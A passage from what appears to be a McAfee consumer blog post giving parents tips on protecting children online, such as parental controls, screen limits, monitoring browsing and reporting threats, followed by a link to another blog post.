  • Teach kids how to safely search the web using tools such as McAfee WebAdvisor. Consider parental controls designed to block risky sites, filter inappropriate content, and help parents set screen limits. And, don’t be shy about physically checking your child’s home screen or PC several times a week.
  • Create screen limits and a phone curfew to prevent late-night online conversations.
  • Be aware of your child isolating more or insisting on more privacy to talk with friends.
  • If your child is attending class online, don’t assume they are safe. Monitor their web surfing activity through browser history and monitoring tools. Connect with teachers to inquire about safety protocols.
  • Seek out help and report it if your child encounters a threatening situation online. You can also contact your local FBI field office.

There’s no way to avoid online risk 100%. Darker elements will always infiltrate the endless opportunity and good stuff the internet offers. As parents, rather than live in fear, we can be proactive. We can understand the risks, take action to minimize them, and make every effort to equip our kids to deal with any threats they encounter online.

Beware When You Search for These TV Shows and Movies https://www.mcafee.com/blogs/consumer/au-beware-when-you-search-for-these-tv-shows-and-movies-2/ Sat, 13 Jun 2020 04:01:17 +0000 /blogs/?p=101895